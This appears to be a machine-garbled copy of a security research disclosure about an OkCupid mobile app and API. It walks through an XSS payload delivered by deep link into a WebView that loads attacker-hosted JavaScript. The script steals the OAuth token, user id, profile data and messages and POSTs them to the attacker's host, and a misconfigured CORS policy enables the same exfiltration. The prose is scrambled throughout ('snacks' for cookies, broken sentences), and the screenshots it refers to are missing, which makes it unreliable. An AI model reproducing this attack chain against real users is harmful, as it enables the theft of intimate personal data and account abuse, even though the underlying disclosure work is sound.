Главная страница » Fragile Data visibility & Performing actions with respect to the target

Fragile Data visibility & Performing actions with respect to the target

Fragile Data visibility & Performing actions with respect to the target

As much as this aspect, we’re able to launch the OkCupid application that is mobile a deep website website link, containing a harmful JavaScript rule into the part parameter. The screenshot that is following the ultimate XSS payload which loads jQuery and then lots JavaScript code through the attacker’s host: (take note the top of area offers the XSS payload additionally the base section is the identical payload encoded with URL encoding):

The screenshot that is following an HTTP GET demand containing the ultimate XSS payload (part parameter):

The host replicates the payload sent previous into the part parameter plus the injected code that is javaScript performed within the context of this WebView.

A script file from the attacker’s server as mentioned before, the final XSS payload loads. The loaded JavaScript code will be utilized for exfiltration and account contains 3 functions:

  1. steal_token – Steals users’ verification token, oauthAccessToken, in addition to users’ id, userid. Users’ sensitive information (PII), such as for instance current email address, is exfiltrated also.
  2. steal_data – Steals users’ profile and personal information, choices, users’ characteristics ( ag e.g. responses filled during registration), and much more.
  3. Send_data_to_attacker – send the data collected in functions 1 and 2 into the attacker’s host.

steal_token function:

The event produces A api call to the host. Users’ be2 profile cookies are provided for the host because the XSS payload is executed into the context of this application’s WebView.

The host responds having A json that is vast the users’ id therefore the verification token too:

Steal information function:

An HTTP is created by the function request endpoint.

On the basis of the information exfiltrated within the steal_token function, the demand will be delivered using the verification token while the user’s id.

The host reacts with the information about the victim’s profile, including email, intimate orientation, height, family members status, etc.

Forward information to attacker function:

The big event produces a POST request into the attacker’s host containing all the details retrieved in the function that is previous (steal_token and steal_data functions).

The after screenshot shows an HTTP POST demand provided for the attacker’s host. The demand human anatomy contains all the victim’s delicate information:

Performing actions with respect to the target can also be feasible because of the exfiltration regarding the victim’s verification token additionally the users’ id. These details is employed when you look at the harmful JavaScript rule (in the same way used in the steal_data function).

An attacker can perform actions such as forward messages and alter profile data because of the information exfiltrated when you look at the function that is steal_token

  1. Authentication token, oauthAccessToken, can be used within the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform complete account takeover considering that the snacks are protected with HTTPOnly.

the knowledge exfiltrated into the steal_token function:

  1. Authentication token, oauthAccessToken, is employed into the authorization header (bearer value).
  2. Consumer id, userId, is added as needed.

Note: An attacker cannot perform account that is full because the snacks are protected with HTTPOnly.

Online System Vulnerabilities Mis-configured Cross-Origin Site Sharing Policy Contributes To Fragile Information Publicity

for the duration of the research, we’ve discovered that the CORS policy regarding the API host api.OkCupid.com isn’t configured precisely and any beginning can deliver needs towards the host and read its’ reactions. The request that is following a demand delivered the API host through the beginning

The host doesn’t correctly validate the foundation and reacts because of the required information. Furthermore, the host reaction contains Access-Control-Allow-Origin: and Access-Control-Allow-Credentials: real headers:

As of this true point on, we recognized that people can deliver needs to the API host from our domain without having to be obstructed by the CORS policy.

Once a target is authenticated on OkCupid browsing and application towards the attacker’s internet application, an HTTP GET demand is provided for containing the victim’s snacks. The server’s reaction has A json that is vast containing the victim’s verification token and also the victim’s user_id.

We’re able to find more helpful data in the bootstrap API endpoint – sensitive and painful API endpoints when you look at the API host:

The after screenshot shows sensitive and painful PII data exfiltration from the /profile/ API endpoint, utilising the victim’s user_id plus the access_token:

The screenshot that is following exfiltration associated with the victim’s communications through the /1/messages/ API endpoint, with the victim’s user_id therefore the access_token:


The field of online-dating apps is rolling out quickly across the years, and matured to where it is at today utilizing the transformation up to a electronic globe, particularly in the past 6 months – considering that the outbreak of Coronavirus around the world. The “new normal” habits such as as “social distancing” have actually forced the dating globe to entirely depend on electronic tools for help.

The study introduced right here shows the potential risks connected with one of several longest-established & most apps that are popular its sector. The serious requirement for privacy and information safety becomes much more important whenever a great deal personal and intimate information being stored, handled and analyzed within an application. The application and platform is made to create individuals together, but needless to say where people get, crooks will observe, hunting for simple pickings.